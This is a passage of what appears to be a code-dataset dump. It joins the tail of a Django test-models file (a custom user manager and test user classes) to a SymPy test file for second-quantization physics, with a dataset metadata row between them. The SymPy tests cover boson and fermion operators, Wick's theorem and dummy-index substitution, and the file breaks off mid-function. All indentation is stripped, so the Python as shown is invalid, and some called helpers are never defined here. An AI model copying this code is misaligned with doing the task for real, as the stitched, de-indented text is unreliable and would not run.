# that every user provide a date of birth. This lets us test
# changes in username datatype, and non-text required fields.
class CustomUserManager(BaseUserManager):
def create_user(self, email, date_of_birth, password=None):
"""
Creates and saves a User with the given email and password.
"""
if not email:
raise ValueError('Users must have an email address')
user = self.model(
email=self.normalize_email(email),
date_of_birth=date_of_birth,
)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, password, date_of_birth):
u = self.create_user(email, password=password, date_of_birth=date_of_birth)
u.is_admin = True
u.save(using=self._db)
return u
class CustomUser(AbstractBaseUser):
email = models.EmailField(verbose_name='email address', max_length=255, unique=True)
is_active = models.BooleanField(default=True)
is_admin = models.BooleanField(default=False)
date_of_birth = models.DateField()
custom_objects = CustomUserManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['date_of_birth']
class Meta:
app_label = 'auth'
def get_full_name(self):
return self.email
def get_short_name(self):
return self.email
def __unicode__(self):
return self.email
# Maybe required?
def get_group_permissions(self, obj=None):
return set()
def get_all_permissions(self, obj=None):
return set()
def has_perm(self, perm, obj=None):
return True
def has_perms(self, perm_list, obj=None):
return True
def has_module_perms(self, app_label):
return True
# Admin required fields
@property
def is_staff(self):
return self.is_admin
class RemoveGroupsAndPermissions(object):
"""
A context manager to temporarily remove the groups and user_permissions M2M
fields from the AbstractUser class, so they don't clash with the
related_name sets.
"""
def __enter__(self):
self._old_au_local_m2m = AbstractUser._meta.local_many_to_many
self._old_pm_local_m2m = PermissionsMixin._meta.local_many_to_many
groups = models.ManyToManyField(Group, blank=True)
groups.contribute_to_class(PermissionsMixin, "groups")
user_permissions = models.ManyToManyField(Permission, blank=True)
user_permissions.contribute_to_class(PermissionsMixin, "user_permissions")
PermissionsMixin._meta.local_many_to_many = [groups, user_permissions]
AbstractUser._meta.local_many_to_many = [groups, user_permissions]
def __exit__(self, exc_type, exc_value, traceback):
AbstractUser._meta.local_many_to_many = self._old_au_local_m2m
PermissionsMixin._meta.local_many_to_many = self._old_pm_local_m2m
# The extension user is a simple extension of the built-in user class,
# adding a required date_of_birth field. This allows us to check for
# any hard references to the name "User" in forms/handlers etc.
with RemoveGroupsAndPermissions():
class ExtensionUser(AbstractUser):
date_of_birth = models.DateField()
custom_objects = UserManager()
REQUIRED_FIELDS = AbstractUser.REQUIRED_FIELDS + ['date_of_birth']
class Meta:
app_label = 'auth'
| mit | -8,085,511,089,587,579,000 | 31.40708 | 88 | 0.647947 | false |
wxgeo/geophar | wxgeometrie/sympy/physics/tests/test_secondquant.py | 8 | 46268 | from sympy.physics.secondquant import (
Dagger, Bd, VarBosonicBasis, BBra, B, BKet, FixedBosonicBasis,
matrix_rep, apply_operators, InnerProduct, Commutator, KroneckerDelta,
AnnihilateBoson, CreateBoson, BosonicOperator,
F, Fd, FKet, BosonState, CreateFermion, AnnihilateFermion,
evaluate_deltas, AntiSymmetricTensor, contraction, NO, wicks,
PermutationOperator, simplify_index_permutations,
_sort_anticommuting_fermions, _get_ordered_dummies,
substitute_dummies
)
from sympy import (Dummy, expand, Function, I, Rational, simplify, sqrt, Sum,
Symbol, symbols)
from sympy.core.compatibility import range
from sympy.utilities.pytest import XFAIL, slow
from sympy.printing.latex import latex
def test_PermutationOperator():
p, q, r, s = symbols('p,q,r,s')
f, g, h, i = map(Function, 'fghi')
P = PermutationOperator
assert P(p, q).get_permuted(f(p)*g(q)) == -f(q)*g(p)
assert P(p, q).get_permuted(f(p, q)) == -f(q, p)
assert P(p, q).get_permuted(f(p)) == f(p)
expr = (f(p)*g(q)*h(r)*i(s)
- f(q)*g(p)*h(r)*i(s)
- f(p)*g(q)*h(s)*i(r)
+ f(q)*g(p)*h(s)*i(r))
perms = [P(p, q), P(r, s)]
assert (simplify_index_permutations(expr, perms) ==
P(p, q)*P(r, s)*f(p)*g(q)*h(r)*i(s))
def test_index_permutations_with_dummies():
a, b, c, d = symbols('a b c d')
p, q, r, s = symbols('p q r s', cls=Dummy)
f, g = map(Function, 'fg')
P = PermutationOperator
# No dummy substitution necessary
expr = f(a, b, p, q) - f(b, a, p, q)
assert simplify_index_permutations(
expr, [P(a, b)]) == P(a, b)*f(a, b, p, q)
# Cases where dummy substitution is needed
expected = P(a, b)*substitute_dummies(f(a, b, p, q))
expr = f(a, b, p, q) - f(b, a, q, p)
result = simplify_index_permutations(expr, [P(a, b)])
assert expected == substitute_dummies(result)
expr = f(a, b, q, p) - f(b, a, p, q)
result = simplify_index_permutations(expr, [P(a, b)])
assert expected == substitute_dummies(result)
# A case where nothing can be done
expr = f(a, b, q, p) - g(b, a, p, q)
result = simplify_index_permutations(expr, [P(a, b)])
assert expr == result
def test_dagger():
i, j, n, m = symbols('i,j,n,m')
assert Dagger(1) == 1
assert Dagger(1.0) == 1.0
assert Dagger(2*I) == -2*I
assert Dagger(Rational(1, 2)*I/3.0) == -Rational(1, 2)*I/3.0
assert Dagger(BKet([n])) == BBra([n])
assert Dagger(B(0)) == Bd(0)
assert Dagger(Bd(0)) == B(0)
assert Dagger(B(n)) == Bd(n)
assert Dagger(Bd(n)) == B(n)
assert Dagger(B(0) + B(1)) == Bd(0) + Bd(1)
assert Dagger(n*m) == Dagger(n)*Dagger(m) # n, m commute
assert Dagger(B(n)*B(m)) == Bd(m)*Bd(n)
assert Dagger(B(n)**10) == Dagger(B(n))**10
def test_operator():
i, j = symbols('i,j')
o = BosonicOperator(i)
assert o.state == i
assert o.is_symbolic
o = BosonicOperator(1)
assert o.state == 1
assert not o.is_symbolic
def test_create():
i, j, n, m = symbols('i,j,n,m')
o = Bd(i)
assert latex(o) == "b^\\dagger_{i}"
assert isinstance(o, CreateBoson)
o = o.subs(i, j)
assert o.atoms(Symbol) == {j}
o = Bd(0)
assert o.apply_operator(BKet([n])) == sqrt(n + 1)*BKet([n + 1])
o = Bd(n)
assert o.apply_operator(BKet([n])) == o*BKet([n])
def test_annihilate():
i, j, n, m = symbols('i,j,n,m')
o = B(i)
assert latex(o) == "b_{i}"
assert isinstance(o, AnnihilateBoson)
o = o.subs(i, j)
assert o.atoms(Symbol) == {j}
o = B(0)
assert o.apply_operator(BKet([n])) == sqrt(n)*BKet([n - 1])
o = B(n)
assert o.apply_operator(BKet([n])) == o*BKet([n])
def test_basic_state():
i, j, n, m = symbols('i,j,n,m')
s = BosonState([0, 1, 2, 3, 4])
assert len(s) == 5
assert s.args[0] == tuple(range(5))
assert s.up(0) == BosonState([1, 1, 2, 3, 4])
assert s.down(4) == BosonState([0, 1, 2, 3, 3])
for i in range(5):
assert s.up(i).down(i) == s
assert s.down(0) == 0
for i in range(5):
assert s[i] == i
s = BosonState([n, m])
assert s.down(0) == BosonState([n - 1, m])
assert s.up(0) == BosonState([n + 1, m])
@XFAIL
def test_move1():
i, j = symbols('i,j')
A, C = symbols('A,C', cls=Function)
o = A(i)*C(j)
# This almost works, but has a minus sign wrong
assert move(o, 0, 1) == KroneckerDelta(i, j) + C(j)*A(i)
@XFAIL
def test_move2():
i, j = symbols('i,j')
A, C = symbols('A,C', cls=Function)
o = C(j)*A(i)
# This almost works, but has a minus sign wrong
assert move(o, 0, 1) == -KroneckerDelta(i, j) + A(i)*C(j)
def test_basic_apply():
n = symbols("n")
e = B(0)*BKet([n])
assert apply_operators(e) == sqrt(n)*BKet([n - 1])
e = Bd(0)*BKet([n])
assert apply_operators(e) == sqrt(n + 1)*BKet([n + 1])
def test_complex_apply():
n, m = symbols("n,m")
o = Bd(0)*B(0)*Bd(1)*B(0)
e = apply_operators(o*BKet([n, m]))
answer = sqrt(n)*sqrt(m + 1)*(-1 + n)*BKet([-1 + n, 1 + m])
assert expand(e) == expand(answer)
def test_number_operator():
n = symbols("n")
o = Bd(0)*B(0)
e = apply_operators(o*BKet([n]))
assert e == n*BKet([n])
def test_inner_product():
i, j, k, l = symbols('i,j,k,l')
s1 = BBra([0])
s2 = BKet([1])
assert InnerProduct(s1, Dagger(s1)) == 1
assert InnerProduct(s1, s2) == 0
s1 = BBra([i, j])
s2 = BKet([k, l])
r = InnerProduct(s1, s2)
assert r == KroneckerDelta(i, k)*KroneckerDelta(j, l)
def test_symbolic_matrix_elements():
n, m = symbols('n,m')
s1 = BBra([n])
s2 = BKet([m])
o = B(0)
e = apply_operators(s1*o*s2)
assert e == sqrt(m)*KroneckerDelta(n, m - 1)
def test_matrix_elements():
b = VarBosonicBasis(5)
o = B(0)
m = matrix_rep(o, b)
for i in range(4):
assert m[i, i + 1] == sqrt(i + 1)
o = Bd(0)
m = matrix_rep(o, b)
for i in range(4):
assert m[i + 1, i] == sqrt(i + 1)
@slow
def test_sho():
n, m = symbols('n,m')
h_n = Bd(n)*B(n)*(n + Rational(1, 2))
H = Sum(h_n, (n, 0, 5))
o = H.doit(deep=False)
b = FixedBosonicBasis(2, 6)
m = matrix_rep(o, b)
# We need to double check these energy values to make sure that they
# are correct and have the proper degeneracies!
diag = [1, 2, 3, 3, 4, 5, 4, 5, 6, 7, 5, 6, 7, 8, 9, 6, 7, 8, 9, 10, 11]
for i in range(len(diag)):
assert diag[i] == m[i, i]
def test_commutation():
n, m = symbols("n,m", above_fermi=True)
c = Commutator(B(0), Bd(0))
assert c == 1
c = Commutator(Bd(0), B(0))
assert c == -1
c = Commutator(B(n), Bd(0))
assert c == KroneckerDelta(n, 0)
c = Commutator(B(0), Bd(0))
e = simplify(apply_operators(c*BKet([n])))
assert e == BKet([n])
c = Commutator(B(0), B(1))
e = simplify(apply_operators(c*BKet([n, m])))
assert e == 0
c = Commutator(F(m), Fd(m))
assert c == +1 - 2*NO(Fd(m)*F(m))
c = Commutator(Fd(m), F(m))
assert c.expand() == -1 + 2*NO(Fd(m)*F(m))
C = Commutator
X, Y, Z = symbols('X,Y,Z', commutative=False)
assert C(C(X, Y), Z) != 0
assert C(C(X, Z), Y) != 0
assert C(Y, C(X, Z)) != 0
i, j, k, l = symbols('i,j,k,l', below_fermi=True)
a, b, c, d = symbols('a,b,c,d', above_fermi=True)
p, q, r, s = symbols('p,q,r,s')
D = KroneckerDelta
assert C(Fd(a), F(i)) == -2*NO(F(i)*Fd(a))
assert C(Fd(j), NO(Fd(a)*F(i))).doit(wicks=True) == -D(j, i)*Fd(a)
assert C(Fd(a)*F(i), Fd(b)*F(j)).doit(wicks=True) == 0
def test_create_f():
i, j, n, m = symbols('i,j,n,m')
o = Fd(i)
assert isinstance(o, CreateFermion)
o = o.subs(i, j)
assert o.atoms(Symbol) == {j}
o = Fd(1)
assert o.apply_operator(FKet([n])) == FKet([1, n])
assert o.apply_operator(FKet([n])) == -FKet([n, 1])
o = Fd(n)
assert o.apply_operator(FKet([])) == FKet([n])
vacuum = FKet([], fermi_level=4)
assert vacuum == FKet([], fermi_level=4)
i, j, k, l = symbols('i,j,k,l', below_fermi=True)
a, b, c, d = symbols('a,b,c,d', above_fermi=True)
p, q, r, s = symbols('p,q,r,s')
assert Fd(i).apply_operator(FKet([i, j, k], 4)) == FKet([j, k], 4)
assert Fd(a).apply_operator(FKet([i, b, k], 4)) == FKet([a, i, b, k], 4)
def test_annihilate_f():
i, j, n, m = symbols('i,j,n,m')
o = F(i)
assert isinstance(o, AnnihilateFermion)
o = o.subs(i, j)
assert o.atoms(Symbol) == {j}
o = F(1)
assert o.apply_operator(FKet([1, n])) == FKet([n])
assert o.apply_operator(FKet([n, 1])) == -FKet([n])
o = F(n)
assert o.apply_operator(FKet([n])) == FKet([])
i, j, k, l = symbols('i,j,k,l', below_fermi=True)
a, b, c, d = symbols('a,b,c,d', above_fermi=True)
p, q, r, s = symbols('p,q,r,s')
assert F(i).apply_operator(FKet([i, j, k], 4)) == 0
assert F(a).apply_operator(FKet([i, b, k], 4)) == 0
assert F(l).apply_operator(FKet([i, j, k], 3)) == 0
assert F(l).apply_operator(FKet([i, j, k], 4)) == FKet([l, i, j, k], 4)
def test_create_b():
i, j, n, m = symbols('i,j,n,m')
o = Bd(i)
assert isinstance(o, CreateBoson)
o = o.subs(i, j)
assert o.atoms(Symbol) == {j}
o = Bd(0)
assert o.apply_operator(BKet([n])) == sqrt(n + 1)*BKet([n + 1])
o = Bd(n)
assert o.apply_operator(BKet([n])) == o*BKet([n])
def test_annihilate_b():
i, j, n, m = symbols('i,j,n,m')
o = B(i)
assert isinstance(o, AnnihilateBoson)
o = o.subs(i, j)
assert o.atoms(Symbol) == {j}
o = B(0)
def test_wicks():
p, q, r, s = symbols('p,q,r,s', above_fermi=True)
# Testing for particles only
str = F(p)*Fd(q)
assert wicks(str) == NO(F(p)*Fd(q)) + KroneckerDelta(p, q)
str = Fd(p)*F(q)
assert wicks(str) == NO(Fd(p)*F(q))
str = F(p)*Fd(q)*F(r)*Fd(s)
nstr = wicks(str)
fasit = NO(
KroneckerDelta(p, q)*KroneckerDelta(r, s)
+ KroneckerDelta(p, q)*AnnihilateFermion(r)*CreateFermion(s)
+ KroneckerDelta(r, s)*AnnihilateFermion(p)*CreateFermion(q)
- KroneckerDelta(p, s)*AnnihilateFermion(r)*CreateFermion(q)
- AnnihilateFermion(p)*AnnihilateFermion(r)*CreateFermion(q)*CreateFermion(s))
assert nstr == fasit
assert (p*q*nstr).expand() == wicks(p*q*str)
assert (nstr*p*q*2).expand() == wicks(str*p*q*2)
# Testing CC equations particles and holes
i, j, k, l = symbols('i j k l', below_fermi=True, cls=Dummy)
a, b, c, d = symbols('a b c d', above_fermi=True, cls=Dummy)
p, q, r, s = symbols('p q r s', cls=Dummy)
assert (wicks(F(a)*NO(F(i)*F(j))*Fd(b)) ==
NO(F(a)*F(i)*F(j)*Fd(b)) +
KroneckerDelta(a, b)*NO(F(i)*F(j)))
assert (wicks(F(a)*NO(F(i)*F(j)*F(k))*Fd(b)) ==
NO(F(a)*F(i)*F(j)*F(k)*Fd(b)) -
KroneckerDelta(a, b)*NO(F(i)*F(j)*F(k)))
expr = wicks(Fd(i)*NO(Fd(j)*F(k))*F(l))
assert (expr ==
-KroneckerDelta(i, k)*NO(Fd(j)*F(l)) -
KroneckerDelta(j, l)*NO(Fd(i)*F(k)) -
KroneckerDelta(i, k)*KroneckerDelta(j, l) +
KroneckerDelta(i, l)*NO(Fd(j)*F(k)) +
NO(Fd(i)*Fd(j)*F(k)*F(l)))
expr = wicks(F(a)*NO(F(b)*Fd(c))*Fd(d))
assert (expr ==
-KroneckerDelta(a, c)*NO(F(b)*Fd(d)) -
KroneckerDelta(b, d)*NO(F(a)*Fd(c)) -
KroneckerDelta(a, c)*KroneckerDelta(b, d) +
KroneckerDelta(a, d)*NO(F(b)*Fd(c)) +
NO(F(a)*F(b)*Fd(c)*Fd(d)))
def test_NO():
i, j, k, l = symbols('i j k l', below_fermi=True)
a, b, c, d = symbols('a b c d', above_fermi=True)
p, q, r, s = symbols('p q r s', cls=Dummy)
assert (NO(Fd(p)*F(q) + Fd(a)*F(b)) ==
NO(Fd(p)*F(q)) + NO(Fd(a)*F(b)))
assert (NO(Fd(i)*NO(F(j)*Fd(a))) ==
NO(Fd(i)*F(j)*Fd(a)))
assert NO(1) == 1
assert NO(i) == i
assert (NO(Fd(a)*Fd(b)*(F(c) + F(d))) ==
NO(Fd(a)*Fd(b)*F(c)) +
NO(Fd(a)*Fd(b)*F(d)))
assert NO(Fd(a)*F(b))._remove_brackets() == Fd(a)*F(b)
assert NO(F(j)*Fd(i))._remove_brackets() == F(j)*Fd(i)
assert (NO(Fd(p)*F(q)).subs(Fd(p), Fd(a) + Fd(i)) ==
NO(Fd(a)*F(q)) + NO(Fd(i)*F(q)))
assert (NO(Fd(p)*F(q)).subs(F(q), F(a) + F(i)) ==
NO(Fd(p)*F(a)) + NO(Fd(p)*F(i)))
expr = NO(Fd(p)*F(q))._remove_brackets()
assert wicks(expr) == NO(expr)
assert NO(Fd(a)*F(b)) == - NO(F(b)*Fd(a))
no = NO(Fd(a)*F(i)*F(b)*Fd(j))
l1 = [ ind for ind in no.iter_q_creators() ]
assert l1 == [0, 1]
l2 = [ ind for ind in no.iter_q_annihilators() ]
assert l2 == [3, 2]
def test_sorting():
i, j = symbols('i,j', below_fermi=True)
a, b = symbols('a,b', above_fermi=True)
p, q = symbols('p,q')
# p, q
assert _sort_anticommuting_fermions([Fd(p), F(q)]) == ([Fd(p), F(q)], 0)
assert _sort_anticommuting_fermions([F(p), Fd(q)]) == ([Fd(q), F(p)], 1)
# i, p
assert _sort_anticommuting_fermions([F(p), Fd(i)]) == ([F(p), Fd(i)], 0)
assert _sort_anticommuting_fermions([Fd(i), F(p)]) == ([F(p), Fd(i)], 1)
assert _sort_anticommuting_fermions([Fd(p), Fd(i)]) == ([Fd(p), Fd(i)], 0)
assert _sort_anticommuting_fermions([Fd(i), Fd(p)]) == ([Fd(p), Fd(i)], 1)
assert _sort_anticommuting_fermions([F(p), F(i)]) == ([F(i), F(p)], 1)
assert _sort_anticommuting_fermions([F(i), F(p)]) == ([F(i), F(p)], 0)
assert _sort_anticommuting_fermions([Fd(p), F(i)]) == ([F(i), Fd(p)], 1)
assert _sort_anticommuting_fermions([F(i), Fd(p)]) == ([F(i), Fd(p)], 0)
# a, p
assert _sort_anticommuting_fermions([F(p), Fd(a)]) == ([Fd(a), F(p)], 1)
assert _sort_anticommuting_fermions([Fd(a), F(p)]) == ([Fd(a), F(p)], 0)
assert _sort_anticommuting_fermions([Fd(p), Fd(a)]) == ([Fd(a), Fd(p)], 1)
assert _sort_anticommuting_fermions([Fd(a), Fd(p)]) == ([Fd(a), Fd(p)], 0)
assert _sort_anticommuting_fermions([F(p), F(a)]) == ([F(p), F(a)], 0)
assert _sort_anticommuting_fermions([F(a), F(p)]) == ([F(p), F(a)], 1)
assert _sort_anticommuting_fermions([Fd(p), F(a)]) == ([Fd(p), F(a)], 0)
assert _sort_anticommuting_fermions([F(a), Fd(p)]) == ([Fd(p), F(a)], 1)
# i, a
assert _sort_anticommuting_fermions([F(i), Fd(j)]) == ([F(i), Fd(j)], 0)
assert _sort_anticommuting_fermions([Fd(j), F(i)]) == ([F(i), Fd(j)], 1)
assert _sort_anticommuting_fermions([Fd(a), Fd(i)]) == ([Fd(a), Fd(i)], 0)
assert _sort_anticommuting_fermions([Fd(i), Fd(a)]) == ([Fd(a), Fd(i)], 1)
assert _sort_anticommuting_fermions([F(a), F(i)]) == ([F(i), F(a)], 1)
assert _sort_anticommuting_fermions([F(i), F(a)]) == ([F(i), F(a)], 0)
def test_contraction():
i, j, k, l = symbols('i,j,k,l', below_fermi=True)
a, b, c, d = symbols('a,b,c,d', above_fermi=True)
p, q, r, s = symbols('p,q,r,s')
assert contraction(Fd(i), F(j)) == KroneckerDelta(i, j)
assert contraction(F(a), Fd(b)) == KroneckerDelta(a, b)
assert contraction(F(a), Fd(i)) == 0
assert contraction(Fd(a), F(i)) == 0
assert contraction(F(i), Fd(a)) == 0
assert contraction(Fd(i), F(a)) == 0
assert contraction(Fd(i), F(p)) == KroneckerDelta(i, p)
restr = evaluate_deltas(contraction(Fd(p), F(q)))
assert restr.is_only_below_fermi
restr = evaluate_deltas(contraction(F(p), Fd(q)))
assert restr.is_only_above_fermi
def test_evaluate_deltas():
i, j, k = symbols('i,j,k')
r = KroneckerDelta(i, j) * KroneckerDelta(j, k)
assert evaluate_deltas(r) == KroneckerDelta(i, k)
r = KroneckerDelta(i, 0) * KroneckerDelta(j, k)
assert evaluate_deltas(r) == KroneckerDelta(i, 0) * KroneckerDelta(j, k)
r = KroneckerDelta(1, j) * KroneckerDelta(j, k)
assert evaluate_deltas(r) == KroneckerDelta(1, k)
r = KroneckerDelta(j, 2) * KroneckerDelta(k, j)
assert evaluate_deltas(r) == KroneckerDelta(2, k)
r = KroneckerDelta(i, 0) * KroneckerDelta(i, j) * KroneckerDelta(j, 1)
assert evaluate_deltas(r) == 0
r = (KroneckerDelta(0, i) * KroneckerDelta(0, j)
* KroneckerDelta(1, j) * KroneckerDelta(1, j))
assert evaluate_deltas(r) == 0
def test_Tensors():
i, j, k, l = symbols('i j k l', below_fermi=True, cls=Dummy)
a, b, c, d = symbols('a b c d', above_fermi=True, cls=Dummy)
p, q, r, s = symbols('p q r s')
AT = AntiSymmetricTensor
assert AT('t', (a, b), (i, j)) == -AT('t', (b, a), (i, j))
assert AT('t', (a, b), (i, j)) == AT('t', (b, a), (j, i))
assert AT('t', (a, b), (i, j)) == -AT('t', (a, b), (j, i))
assert AT('t', (a, a), (i, j)) == 0
assert AT('t', (a, b), (i, i)) == 0
assert AT('t', (a, b, c), (i, j)) == -AT('t', (b, a, c), (i, j))
assert AT('t', (a, b, c), (i, j, k)) == AT('t', (b, a, c), (i, k, j))
tabij = AT('t', (a, b), (i, j))
assert tabij.has(a)
assert tabij.has(b)
assert tabij.has(i)
assert tabij.has(j)
assert tabij.subs(b, c) == AT('t', (a, c), (i, j))
assert (2*tabij).subs(i, c) == 2*AT('t', (a, b), (c, j))
assert AT('t', (a, a), (i, j)).subs(a, b) == AT('t', (b, b), (i, j))
assert AT('t', (a, i), (a, j)).subs(a, b) == AT('t', (b, i), (b, j))
def test_fully_contracted():
i, j, k, l = symbols('i j k l', below_fermi=True)
a, b, c, d = symbols('a b c d', above_fermi=True)
p, q, r, s = symbols('p q r s', cls=Dummy)
Fock = (AntiSymmetricTensor('f', (p,), (q,))*
NO(Fd(p)*F(q)))
V = (AntiSymmetricTensor('v', (p, q), (r, s))*
NO(Fd(p)*Fd(q)*F(s)*F(r)))/4
Fai = wicks(NO(Fd(i)*F(a))*Fock,
keep_only_fully_contracted=True,
simplify_kronecker_deltas=True)
assert Fai == AntiSymmetricTensor('f', (a,), (i,))
Vabij = wicks(NO(Fd(i)*Fd(j)*F(b)*F(a))*V,
keep_only_fully_contracted=True,
simplify_kronecker_deltas=True)
assert Vabij == AntiSymmetricTensor('v', (a, b), (i, j))
def test_substitute_dummies_without_dummies():
i, j = symbols('i,j')
assert substitute_dummies(att(i, j) + 2) == att(i, j) + 2
assert substitute_dummies(att(i, j) + 1) == att(i, j) + 1
def test_substitute_dummies_NO_operator():
i, j = symbols('i j', cls=Dummy)
assert substitute_dummies(att(i, j)*NO(Fd(i)*F(j))
- att(j, i)*NO(Fd(j)*F(i))) == 0
def test_substitute_dummies_SQ_operator():
i, j = symbols('i j', cls=Dummy)
assert substitute_dummies(att(i, j)*Fd(i)*F(j)
- att(j, i)*Fd(j)*F(i)) == 0
def test_substitute_dummies_new_indices():
i, j = symbols('i j', below_fermi=True, cls=Dummy)
a, b = symbols('a b', above_fermi=True, cls=Dummy)
p, q = symbols('p q', cls=Dummy)
f = Function('f')
assert substitute_dummies(f(i, a, p) - f(j, b, q), new_indices=True) == 0
def test_substitute_dummies_substitution_order():
i, j, k, l = symbols('i j k l', below_fermi=True, cls=Dummy)
f = Function('f')
from sympy.utilities.iterables import variations
for permut in variations([i, j, k, l], 4):
assert substitute_dummies(f(*permut) - f(i, j, k, l)) == 0
def test_dummy_order_inner_outer_lines_VT1T1T1():
ii = symbols('i', below_fermi=True)
aa = symbols('a', above_fermi=True)
k, l = symbols('k l', below_fermi=True, cls=Dummy)
c, d = symbols('c d', above_fermi=True, cls=Dummy)
v = Function('v')
t = Function('t')
dums = _get_ordered_dummies
# Coupled-Cluster T1 terms with V*T1*T1*T1
# t^{a}_{k} t^{c}_{i} t^{d}_{l} v^{lk}_{dc}
exprs = [
# permut v and t <=> swapping internal lines, equivalent
# irrespective of symmetries in v
v(k, l, c, d)*t(c, ii)*t(d, l)*t(aa, k),
v(l, k, c, d)*t(c, ii)*t(d, k)*t(aa, l),
v(k, l, d, c)*t(d, ii)*t(c, l)*t(aa, k),
v(l, k, d, c)*t(d, ii)*t(c, k)*t(aa, l),
]
for permut in exprs[1:]:
assert dums(exprs[0]) != dums(permut)
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
def test_dummy_order_inner_outer_lines_VT1T1T1T1():
ii, jj = symbols('i j', below_fermi=True)
aa, bb = symbols('a b', above_fermi=True)
k, l = symbols('k l', below_fermi=True, cls=Dummy)
c, d = symbols('c d', above_fermi=True, cls=Dummy)
v = Function('v')
t = Function('t')
dums = _get_ordered_dummies
# Coupled-Cluster T2 terms with V*T1*T1*T1*T1
exprs = [
# permut t <=> swapping external lines, not equivalent
# except if v has certain symmetries.
v(k, l, c, d)*t(c, ii)*t(d, jj)*t(aa, k)*t(bb, l),
v(k, l, c, d)*t(c, jj)*t(d, ii)*t(aa, k)*t(bb, l),
v(k, l, c, d)*t(c, ii)*t(d, jj)*t(bb, k)*t(aa, l),
v(k, l, c, d)*t(c, jj)*t(d, ii)*t(bb, k)*t(aa, l),
]
for permut in exprs[1:]:
assert dums(exprs[0]) != dums(permut)
assert substitute_dummies(exprs[0]) != substitute_dummies(permut)
exprs = [
# permut v <=> swapping external lines, not equivalent
# except if v has certain symmetries.
#
# Note that in contrast to above, these permutations have identical
# dummy order. That is because the proximity to external indices
# has higher influence on the canonical dummy ordering than the
# position of a dummy on the factors. In fact, the terms here are
        # similar in structure to the result of the dummy substitutions above.
v(k, l, c, d)*t(c, ii)*t(d, jj)*t(aa, k)*t(bb, l),
v(l, k, c, d)*t(c, ii)*t(d, jj)*t(aa, k)*t(bb, l),
v(k, l, d, c)*t(c, ii)*t(d, jj)*t(aa, k)*t(bb, l),
v(l, k, d, c)*t(c, ii)*t(d, jj)*t(aa, k)*t(bb, l),
]
for permut in exprs[1:]:
assert dums(exprs[0]) == dums(permut)
assert substitute_dummies(exprs[0]) != substitute_dummies(permut)
exprs = [
# permut t and v <=> swapping internal lines, equivalent.
# Canonical dummy order is different, and a consistent
# substitution reveals the equivalence.
v(k, l, c, d)*t(c, ii)*t(d, jj)*t(aa, k)*t(bb, l),
v(k, l, d, c)*t(c, jj)*t(d, ii)*t(aa, k)*t(bb, l),
v(l, k, c, d)*t(c, ii)*t(d, jj)*t(bb, k)*t(aa, l),
v(l, k, d, c)*t(c, jj)*t(d, ii)*t(bb, k)*t(aa, l),
]
for permut in exprs[1:]:
assert dums(exprs[0]) != dums(permut)
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
def test_equivalent_internal_lines_VT1T1():
i, j, k, l = symbols('i j k l', below_fermi=True, cls=Dummy)
a, b, c, d = symbols('a b c d', above_fermi=True, cls=Dummy)
v = Function('v')
t = Function('t')
dums = _get_ordered_dummies
exprs = [ # permute v. Different dummy order. Not equivalent.
v(i, j, a, b)*t(a, i)*t(b, j),
v(j, i, a, b)*t(a, i)*t(b, j),
v(i, j, b, a)*t(a, i)*t(b, j),
]
for permut in exprs[1:]:
assert dums(exprs[0]) != dums(permut)
assert substitute_dummies(exprs[0]) != substitute_dummies(permut)
exprs = [ # permute v. Different dummy order. Equivalent
v(i, j, a, b)*t(a, i)*t(b, j),
v(j, i, b, a)*t(a, i)*t(b, j),
]
for permut in exprs[1:]:
assert dums(exprs[0]) != dums(permut)
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
exprs = [ # permute t. Same dummy order, not equivalent.
v(i, j, a, b)*t(a, i)*t(b, j),
v(i, j, a, b)*t(b, i)*t(a, j),
]
for permut in exprs[1:]:
assert dums(exprs[0]) == dums(permut)
assert substitute_dummies(exprs[0]) != substitute_dummies(permut)
exprs = [ # permute v and t. Different dummy order, equivalent
v(i, j, a, b)*t(a, i)*t(b, j),
v(j, i, a, b)*t(a, j)*t(b, i),
v(i, j, b, a)*t(b, i)*t(a, j),
v(j, i, b, a)*t(b, j)*t(a, i),
]
for permut in exprs[1:]:
assert dums(exprs[0]) != dums(permut)
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
def test_equivalent_internal_lines_VT2conjT2():
# this diagram requires special handling in TCE
i, j, k, l, m, n = symbols('i j k l m n', below_fermi=True, cls=Dummy)
a, b, c, d, e, f = symbols('a b c d e f', above_fermi=True, cls=Dummy)
p1, p2, p3, p4 = symbols('p1 p2 p3 p4', above_fermi=True, cls=Dummy)
h1, h2, h3, h4 = symbols('h1 h2 h3 h4', below_fermi=True, cls=Dummy)
from sympy.utilities.iterables import variations
v = Function('v')
t = Function('t')
dums = _get_ordered_dummies
# v(abcd)t(abij)t(ijcd)
template = v(p1, p2, p3, p4)*t(p1, p2, i, j)*t(i, j, p3, p4)
permutator = variations([a, b, c, d], 4)
base = template.subs(zip([p1, p2, p3, p4], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4], permut)
expr = template.subs(subslist)
assert dums(base) != dums(expr)
assert substitute_dummies(expr) == substitute_dummies(base)
template = v(p1, p2, p3, p4)*t(p1, p2, j, i)*t(j, i, p3, p4)
permutator = variations([a, b, c, d], 4)
base = template.subs(zip([p1, p2, p3, p4], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4], permut)
expr = template.subs(subslist)
assert dums(base) != dums(expr)
assert substitute_dummies(expr) == substitute_dummies(base)
# v(abcd)t(abij)t(jicd)
template = v(p1, p2, p3, p4)*t(p1, p2, i, j)*t(j, i, p3, p4)
permutator = variations([a, b, c, d], 4)
base = template.subs(zip([p1, p2, p3, p4], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4], permut)
expr = template.subs(subslist)
assert dums(base) != dums(expr)
assert substitute_dummies(expr) == substitute_dummies(base)
template = v(p1, p2, p3, p4)*t(p1, p2, j, i)*t(i, j, p3, p4)
permutator = variations([a, b, c, d], 4)
base = template.subs(zip([p1, p2, p3, p4], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4], permut)
expr = template.subs(subslist)
assert dums(base) != dums(expr)
assert substitute_dummies(expr) == substitute_dummies(base)
def test_equivalent_internal_lines_VT2conjT2_ambiguous_order():
    # These diagrams invoke _determine_ambiguous() because the
    # dummies cannot be ordered unambiguously by the key alone
i, j, k, l, m, n = symbols('i j k l m n', below_fermi=True, cls=Dummy)
